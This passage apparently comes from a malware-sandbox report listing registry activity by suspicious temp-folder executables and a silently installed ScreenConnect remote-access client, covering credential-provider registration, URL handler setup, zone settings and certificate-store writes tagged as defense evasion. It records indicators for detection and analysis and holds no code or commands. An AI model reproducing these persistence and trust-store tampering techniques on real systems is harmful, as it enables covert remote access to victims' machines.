Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main N/A N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\DrvInst.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.WindowsCredentialProvider.dll" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E4BCFB79704FF87AB30ED9E9E548C002 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\sc-3be09d9e5e840c20\shell\open\command C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F371D3396946D7F0354CFF6462B809A1\Full C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\ProductIcon = "C:\\Windows\\Installer\\{933D173F-6496-0F7D-53C4-FF46268B901A}\\DefaultIcon" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\3be09d9e5e840c20\\" C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387} C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\ProductName = "ScreenConnect Client (3be09d9e5e840c20)" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\ = "ScreenConnect Client (3be09d9e5e840c20) Credential Provider" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F371D3396946D7F0354CFF6462B809A1 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E4BCFB79704FF87AB30ED9E9E548C002\F371D3396946D7F0354CFF6462B809A1 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\URL Protocol C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\UseOriginalUrlEncoding = "1" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open\command C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Version = "402915332" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\3be09d9e5e840c20\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\sc-3be09d9e5e840c20 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.WindowsClient.exe\" \"%1\"" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\PackageCode = "F371D3396946D7F0354CFF6462B809A1" C:\Windows\system32\msiexec.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff04053